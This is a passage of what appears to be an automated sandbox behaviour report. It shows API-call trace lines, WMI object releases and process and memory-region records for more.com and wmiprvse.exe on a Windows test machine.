[0566.433] fprintf (in: _File=0x7feff772ab0, _Format="%s" | out: _File=0x7feff772ab0) returned 29
[0566.433] fflush (in: _File=0x7feff772ab0 | out: _File=0x7feff772ab0) returned 0
[0566.433] free (_Block=0x18cee0)
[0566.434] free (_Block=0x18fe50)
[0566.434] malloc (_Size=0x800) returned 0x18efc0
[0566.434] LoadStringW (in: hInstance=0x0, uID=0xafd2, lpBuffer=0x18efc0, cchBufferMax=1024 | out: lpBuffer="\r\n") returned 0x2
[0566.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 3
[0566.434] malloc (_Size=0x3) returned 0x187fa0
[0566.434] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="\r\n", cchWideChar=-1, lpMultiByteStr=0x187fa0, cbMultiByte=3, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\r\n", lpUsedDefaultChar=0x0) returned 3
[0566.434] fprintf (in: _File=0x7feff772ab0, _Format="%s" | out: _File=0x7feff772ab0) returned 2
[0566.434] fflush (in: _File=0x7feff772ab0 | out: _File=0x7feff772ab0) returned 0
[0566.435] free (_Block=0x187fa0)
[0566.435] free (_Block=0x18efc0)
[0566.436] free (_Block=0x18fdc0)
[0566.436] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0566.436] free (_Block=0x189040)
[0566.436] ??1CHString@@QEAA@XZ () returned 0x303e1201
[0566.436] FreeThreadedDOMDocument:IUnknown:Release (This=0x1fd71d0) returned 0x0
[0566.436] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0566.436] free (_Block=0x1896e0)
[0566.436] malloc (_Size=0x18) returned 0x1896e0
[0566.436] free (_Block=0x189740)
[0566.436] malloc (_Size=0x18) returned 0x189740
[0566.436] free (_Block=0x18cce0)
[0566.436] free (_Block=0x189760)
[0566.436] free (_Block=0x189700)
[0566.436] free (_Block=0x1896c0)
[0566.436] free (_Block=0x1896e0)
[0566.436] free (_Block=0x189740)
[0566.437] free (_Block=0x18cbe0)
[0566.437] free (_Block=0x1895c0)
[0566.437] free (_Block=0x188680)
[0566.437] free (_Block=0x18cde0)
[0566.438] free (_Block=0x18ce10)
[0566.438] free (_Block=0x188780)
[0566.438] free (_Block=0x189780)
[0566.438] free (_Block=0x188640)
[0566.438] free (_Block=0x189620)
[0566.438] free (_Block=0x1896a0)
[0566.438] free (_Block=0x18cdc0)
[0566.439] free (_Block=0x186e10)
[0566.439] free (_Block=0x18cd60)
[0566.439] free (_Block=0x18ce30)
[0566.439] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0566.439] free (_Block=0x18cc60)
[0566.439] free (_Block=0x1895e0)
[0566.439] free (_Block=0x189600)
[0566.440] free (_Block=0x18cd10)
[0566.440] free (_Block=0x18cd40)
[0566.440] free (_Block=0x18cd90)
[0566.440] free (_Block=0x187f00)
[0566.441] free (_Block=0x187f50)
[0566.441] free (_Block=0x1865e0)
[0566.441] free (_Block=0x189660)
[0566.441] free (_Block=0x186670)
[0566.441] free (_Block=0x186df0)
[0566.442] free (_Block=0x188080)
[0566.442] free (_Block=0x186dd0)
[0566.442] free (_Block=0x188040)
[0566.442] free (_Block=0x1869b0)
[0566.442] free (_Block=0x188000)
[0566.442] free (_Block=0x186890)
[0566.443] free (_Block=0x1868b0)
[0566.443] free (_Block=0x186830)
[0566.444] free (_Block=0x186850)
[0566.444] free (_Block=0x1868f0)
[0566.444] free (_Block=0x186910)
[0566.444] free (_Block=0x186950)
[0566.444] free (_Block=0x186970)
[0566.445] free (_Block=0x186770)
[0566.445] free (_Block=0x186790)
[0566.445] free (_Block=0x186710)
[0566.445] free (_Block=0x186730)
[0566.445] free (_Block=0x1867d0)
[0566.446] free (_Block=0x1867f0)
[0566.446] free (_Block=0x1866b0)
[0566.446] free (_Block=0x1866d0)
[0566.446] free (_Block=0x186630)
[0566.447] free (_Block=0x37dfa0)
[0566.447] free (_Block=0x18cb50)
[0566.447] WbemObjectTextSrc:IUnknown:Release (This=0x2fc920) returned 0x0
[0566.447] IUnknown:Release (This=0x2fcea0) returned 0x0
[0566.447] WbemLocator:IUnknown:Release (This=0x29cc20) returned 0x2
[0566.447] WbemLocator:IUnknown:Release (This=0x3089a0) returned 0x0
[0566.448] WbemLocator:IUnknown:Release (This=0x308880) returned 0x0
[0566.449] WbemLocator:IUnknown:Release (This=0x29cc20) returned 0x1
[0566.449] ?Empty@CHString@@QEAAXXZ () returned 0x7fef5b8c96c
[0566.449] WbemLocator:IUnknown:Release (This=0x29cc20) returned 0x0
[0566.449] free (_Block=0x1894e0)
[0566.450] free (_Block=0x189500)
[0566.450] free (_Block=0x188580)
[0566.450] free (_Block=0x189520)
[0566.450] free (_Block=0x189540)
[0566.450] free (_Block=0x1885c0)
[0566.451] free (_Block=0x189360)
[0566.451] free (_Block=0x189380)
[0566.451] free (_Block=0x188400)
[0566.451] free (_Block=0x1893a0)
[0566.451] free (_Block=0x1893c0)
[0566.452] free (_Block=0x188440)
[0566.452] free (_Block=0x1892e0)
[0566.452] free (_Block=0x189300)
[0566.452] free (_Block=0x188380)
[0566.452] free (_Block=0x189320)
[0566.452] free (_Block=0x189340)
[0566.453] free (_Block=0x1883c0)
[0566.453] free (_Block=0x189460)
[0566.453] free (_Block=0x189480)
[0566.453] free (_Block=0x188500)
[0566.453] free (_Block=0x1894a0)
[0566.453] free (_Block=0x1894c0)
[0566.454] free (_Block=0x188540)
[0566.454] free (_Block=0x189260)
[0566.454] free (_Block=0x189280)
[0566.454] free (_Block=0x188300)
[0566.455] free (_Block=0x1892a0)
[0566.455] free (_Block=0x1892c0)
[0566.455] free (_Block=0x188340)
[0566.455] free (_Block=0x1893e0)
[0566.455] free (_Block=0x189400)
[0566.456] free (_Block=0x188480)
[0566.456] free (_Block=0x189420)
[0566.456] free (_Block=0x189440)
[0566.456] free (_Block=0x1884c0)
[0566.457] free (_Block=0x1891a0)
[0566.457] free (_Block=0x1891c0)
[0566.457] free (_Block=0x188240)
[0566.458] free (_Block=0x189060)
[0566.458] free (_Block=0x189080)
[0566.458] free (_Block=0x188100)
[0566.459] free (_Block=0x189000)
[0566.459] free (_Block=0x189020)
[0566.460] free (_Block=0x1880c0)
[0566.460] free (_Block=0x1890e0)
[0566.460] free (_Block=0x189100)
[0566.461] free (_Block=0x188180)
[0566.461] free (_Block=0x1891e0)
[0566.461] free (_Block=0x189200)
[0566.462] free (_Block=0x188280)
[0566.462] free (_Block=0x1890a0)
[0566.462] free (_Block=0x1890c0)
[0566.462] free (_Block=0x188140)
[0566.463] free (_Block=0x189120)
[0566.463] free (_Block=0x189140)
[0566.463] free (_Block=0x1881c0)
[0566.463] free (_Block=0x189160)
[0566.463] free (_Block=0x189180)
[0566.464] free (_Block=0x188200)
[0566.464] free (_Block=0x189220)
[0566.464] free (_Block=0x189240)
[0566.465] free (_Block=0x1882c0)
[0566.465] CoUninitialize ()
[0566.465] DllCanUnloadNow () returned 0x0
[0566.511] free (_Block=0x18e630)
[0566.511] ??3@YAXPEAX@Z () returned 0x740098002e0001
[0566.511] ??3@YAXPEAX@Z () returned 0x45005000050001
[0566.511] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.511] ??3@YAXPEAX@Z () returned 0x303e1201
[0566.513] free (_Block=0x18aa10)
[0566.567] exit (_Code=0)
[0566.568] free (_Block=0x186e60)
[0566.572] free (_Block=0x187db0)
[0566.572] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0566.572] free (_Block=0x186ef0)
[0566.572] free (_Block=0x186690)
[0566.573] free (_Block=0x187d70)
[0566.573] free (_Block=0x187d30)
[0566.574] free (_Block=0x187ce0)
[0566.574] free (_Block=0x187ca0)
[0566.574] free (_Block=0x18ce60)
[0566.575] free (_Block=0x187c40)
[0566.576] free (_Block=0x187bc0)
[0566.576] free (_Block=0x185b20)
[0566.577] free (_Block=0x18ceb0)
[0566.577] ??1CHString@@QEAA@XZ () returned 0x7fef5b8c96c
[0566.577] free (_Block=0x188600)
Thread:
id = 244
os_tid = 0x44c
Thread:
id = 245
os_tid = 0x218
Thread:
id = 246
os_tid = 0x2bc
Thread:
id = 247
os_tid = 0x29c
Thread:
id = 248
os_tid = 0x188
Process:
id = "33"
image_name = "more.com"
filename = "c:\\windows\\system32\\more.com"
page_root = "0x6787f000"
os_pid = "0x4dc"
os_integrity_level = "0x2000"
os_privileges = "0x800000"
monitor_reason = "child_process"
parent_id = "31"
os_parent_pid = "0x740"
cmd_line = "more "
cur_dir = "C:\\Windows\\system32\\"
os_username = "Q9IATRKPRH\\kEecfMwgj"
bitness = "32"
os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f7b2" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]
Region:
id = 4815
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4816
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4817
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4818
start_va = 0x130000
end_va = 0x1affff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000130000"
filename = ""
Region:
id = 4819
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4820
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4821
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4822
start_va = 0xff820000
end_va = 0xff829fff
monitored = 0
entry_point = 0xff82409c
region_type = mapped_file
name = "more.com"
filename = "\\Windows\\System32\\more.com" (normalized: "c:\\windows\\system32\\more.com")
Region:
id = 4823
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4824
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4825
start_va = 0x7fffffdd000
end_va = 0x7fffffdefff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdd000"
filename = ""
Region:
id = 4826
start_va = 0x7fffffdf000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffdf000"
filename = ""
Region:
id = 4827
start_va = 0x1b0000
end_va = 0x2fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001b0000"
filename = ""
Region:
id = 4828
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4829
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4830
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4831
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4832
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 4833
start_va = 0x20000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000020000"
filename = ""
Region:
id = 4834
start_va = 0x50000
end_va = 0xb6fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 4841
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 4842
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 4843
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 4844
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 4845
start_va = 0x7fef72a0000
end_va = 0x7fef72c7fff
monitored = 0
entry_point = 0x7fef72a1408
region_type = mapped_file
name = "ulib.dll"
filename = "\\Windows\\System32\\ulib.dll" (normalized: "c:\\windows\\system32\\ulib.dll")
Region:
id = 4847
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 4848
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 4849
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 4850
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 4851
start_va = 0x300000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 4852
start_va = 0x300000
end_va = 0x3fffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000300000"
filename = ""
Region:
id = 4853
start_va = 0x450000
end_va = 0x45ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000450000"
filename = ""
Region:
id = 4854
start_va = 0x460000
end_va = 0x5e7fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000460000"
filename = ""
Region:
id = 4855
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4856
start_va = 0xc0000
end_va = 0xe8fff
monitored = 0
entry_point = 0xc1010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4857
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 4858
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 4859
start_va = 0x5f0000
end_va = 0x770fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000005f0000"
filename = ""
Region:
id = 4860
start_va = 0x780000
end_va = 0x1b7ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000780000"
filename = ""
Region:
id = 4862
start_va = 0xc0000
end_va = 0xc0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000c0000"
filename = ""
Region:
id = 4863
start_va = 0xd0000
end_va = 0xd0fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000000d0000"
filename = ""
Region:
id = 4864
start_va = 0xe0000
end_va = 0x117fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ulib.dll.mui"
filename = "\\Windows\\System32\\en-US\\ulib.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\ulib.dll.mui")
Thread:
id = 243
os_tid = 0x368
Process:
id = "34"
image_name = "wmiprvse.exe"
filename = "c:\\windows\\system32\\wbem\\wmiprvse.exe"
page_root = "0x4722f000"
os_pid = "0x7e4"
os_integrity_level = "0x4000"
os_privileges = "0x60800000"
monitor_reason = "child_process"
parent_id = "28"
os_parent_pid = "0x260"
cmd_line = "C:\\Windows\\system32\\wbem\\wmiprvse.exe -secured -Embedding"
cur_dir = "C:\\Windows\\system32\\"
os_username = "NT AUTHORITY\\Network Service"
bitness = "32"
os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "WMI (Network Service)" [0xf], "NT AUTHORITY\\Logon Session 00000000:0002b6b3" [0xc000000f]
Region:
id = 4982
start_va = 0x10000
end_va = 0x2ffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000010000"
filename = ""
Region:
id = 4983
start_va = 0x30000
end_va = 0x33fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000030000"
filename = ""
Region:
id = 4984
start_va = 0x40000
end_va = 0x40fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000040000"
filename = ""
Region:
id = 4985
start_va = 0x70000
end_va = 0xeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000070000"
filename = ""
Region:
id = 4986
start_va = 0x77c30000
end_va = 0x77dd8fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 4987
start_va = 0x7efe0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007efe0000"
filename = ""
Region:
id = 4988
start_va = 0x7ffe0000
end_va = 0x7ffeffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 4989
start_va = 0x13fd00000
end_va = 0x13fd6bfff
monitored = 0
entry_point = 0x13fd3b450
region_type = mapped_file
name = "wmiprvse.exe"
filename = "\\Windows\\System32\\wbem\\WmiPrvSE.exe" (normalized: "c:\\windows\\system32\\wbem\\wmiprvse.exe")
Region:
id = 4990
start_va = 0x7fefff50000
end_va = 0x7fefff50fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "apisetschema.dll"
filename = "\\Windows\\System32\\apisetschema.dll" (normalized: "c:\\windows\\system32\\apisetschema.dll")
Region:
id = 4991
start_va = 0x7fffffb0000
end_va = 0x7fffffd2fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000007fffffb0000"
filename = ""
Region:
id = 4992
start_va = 0x7fffffd7000
end_va = 0x7fffffd7fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffd7000"
filename = ""
Region:
id = 4993
start_va = 0x7fffffde000
end_va = 0x7fffffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000007fffffde000"
filename = ""
Region:
id = 4994
start_va = 0x1c0000
end_va = 0x2bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000001c0000"
filename = ""
Region:
id = 4995
start_va = 0x77b10000
end_va = 0x77c2efff
monitored = 0
entry_point = 0x77b25340
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 4996
start_va = 0x7fefdd30000
end_va = 0x7fefdd9bfff
monitored = 0
entry_point = 0x7fefdd32780
region_type = mapped_file
name = "kernelbase.dll"
filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll")
Region:
id = 4997
start_va = 0x10000
end_va = 0x1ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000010000"
filename = ""
Region:
id = 4998
start_va = 0x7efe0000
end_va = 0x7f0dffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 4999
start_va = 0x7f0e0000
end_va = 0x7ffdffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 5000
start_va = 0xf0000
end_va = 0x156fff
monitored = 0
entry_point = 0x0
region_type = mapped_file
name = "locale.nls"
filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls")
Region:
id = 5001
start_va = 0x77a10000
end_va = 0x77b09fff
monitored = 0
entry_point = 0x77a2a2c8
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 5002
start_va = 0x7fefe0a0000
end_va = 0x7fefe106fff
monitored = 0
entry_point = 0x7fefe0ab03c
region_type = mapped_file
name = "gdi32.dll"
filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll")
Region:
id = 5003
start_va = 0x7fefdf50000
end_va = 0x7fefdf5dfff
monitored = 0
entry_point = 0x7fefdf51080
region_type = mapped_file
name = "lpk.dll"
filename = "\\Windows\\System32\\lpk.dll" (normalized: "c:\\windows\\system32\\lpk.dll")
Region:
id = 5004
start_va = 0x7feff530000
end_va = 0x7feff5f8fff
monitored = 0
entry_point = 0x7feff5aa874
region_type = mapped_file
name = "usp10.dll"
filename = "\\Windows\\System32\\usp10.dll" (normalized: "c:\\windows\\system32\\usp10.dll")
Region:
id = 5005
start_va = 0x7feff6e0000
end_va = 0x7feff77efff
monitored = 0
entry_point = 0x7feff6e25a0
region_type = mapped_file
name = "msvcrt.dll"
filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll")
Region:
id = 5006
start_va = 0x7feff600000
end_va = 0x7feff6d6fff
monitored = 0
entry_point = 0x7feff603274
region_type = mapped_file
name = "oleaut32.dll"
filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll")
Region:
id = 5007
start_va = 0x7feff780000
end_va = 0x7feff982fff
monitored = 0
entry_point = 0x7feff7a3330
region_type = mapped_file
name = "ole32.dll"
filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll")
Region:
id = 5008
start_va = 0x7feffba0000
end_va = 0x7feffcccfff
monitored = 0
entry_point = 0x7feffbeed50
region_type = mapped_file
name = "rpcrt4.dll"
filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll")
Region:
id = 5009
start_va = 0x7feff320000
end_va = 0x7feff3fafff
monitored = 0
entry_point = 0x7feff340760
region_type = mapped_file
name = "advapi32.dll"
filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll")
Region:
id = 5010
start_va = 0x7feff400000
end_va = 0x7feff41efff
monitored = 0
entry_point = 0x7feff4060e8
region_type = mapped_file
name = "sechost.dll"
filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll")
Region:
id = 5011
start_va = 0x7fef88c0000
end_va = 0x7fef8992fff
monitored = 0
entry_point = 0x7fef8938b00
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 5012
start_va = 0x7fefa260000
end_va = 0x7fefa2d6fff
monitored = 1
entry_point = 0x7fefa29e7f0
region_type = mapped_file
name = "wbemcomn2.dll"
filename = "\\Windows\\System32\\wbemcomn2.dll" (normalized: "c:\\windows\\system32\\wbemcomn2.dll")
Region:
id = 5013
start_va = 0x7fefd5e0000
end_va = 0x7fefd601fff
monitored = 0
entry_point = 0x7fefd5e5d30
region_type = mapped_file
name = "bcrypt.dll"
filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll")
Region:
id = 5014
start_va = 0x7feffcd0000
end_va = 0x7feffd1cfff
monitored = 0
entry_point = 0x7feffcd1070
region_type = mapped_file
name = "ws2_32.dll"
filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll")
Region:
id = 5015
start_va = 0x7fefdf60000
end_va = 0x7fefdf67fff
monitored = 0
entry_point = 0x7fefdf61504
region_type = mapped_file
name = "nsi.dll"
filename = "\\Windows\\System32\\nsi.dll" (normalized: "c:\\windows\\system32\\nsi.dll")
Region:
id = 5016
start_va = 0x7fef8890000
end_va = 0x7fef88b6fff
monitored = 0
entry_point = 0x7fef88911a0
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 5017
start_va = 0x7fef5040000
end_va = 0x7fef5051fff
monitored = 0
entry_point = 0x7fef50489d0
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 5018
start_va = 0x2c0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000002c0000"
filename = ""
Region:
id = 5019
start_va = 0x3c0000
end_va = 0x4bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003c0000"
filename = ""
Region:
id = 5020
start_va = 0x160000
end_va = 0x188fff
monitored = 0
entry_point = 0x161010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5021
start_va = 0x4c0000
end_va = 0x647fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000004c0000"
filename = ""
Region:
id = 5022
start_va = 0x160000
end_va = 0x188fff
monitored = 0
entry_point = 0x161010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5023
start_va = 0x7feffb70000
end_va = 0x7feffb9dfff
monitored = 0
entry_point = 0x7feffb71010
region_type = mapped_file
name = "imm32.dll"
filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll")
Region:
id = 5024
start_va = 0x7feff420000
end_va = 0x7feff528fff
monitored = 0
entry_point = 0x7feff421064
region_type = mapped_file
name = "msctf.dll"
filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll")
Region:
id = 5025
start_va = 0x2c0000
end_va = 0x37ffff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x00000000002c0000"
filename = ""
Region:
id = 5026
start_va = 0x3b0000
end_va = 0x3bffff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x00000000003b0000"
filename = ""
Region:
id = 5027
start_va = 0x650000
end_va = 0x7d0fff
monitored = 1
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x0000000000650000"
filename = ""
Region:
id = 5028
start_va = 0x20000
end_va = 0x20fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000020000"
filename = ""
Region:
id = 5029
start_va = 0x50000
end_va = 0x50fff
monitored = 1
entry_point = 0x0
region_type = private
name = "private_0x0000000000050000"
filename = ""
Region:
id = 5030
start_va = 0x7e0000
end_va = 0x93ffff
monitored = 1
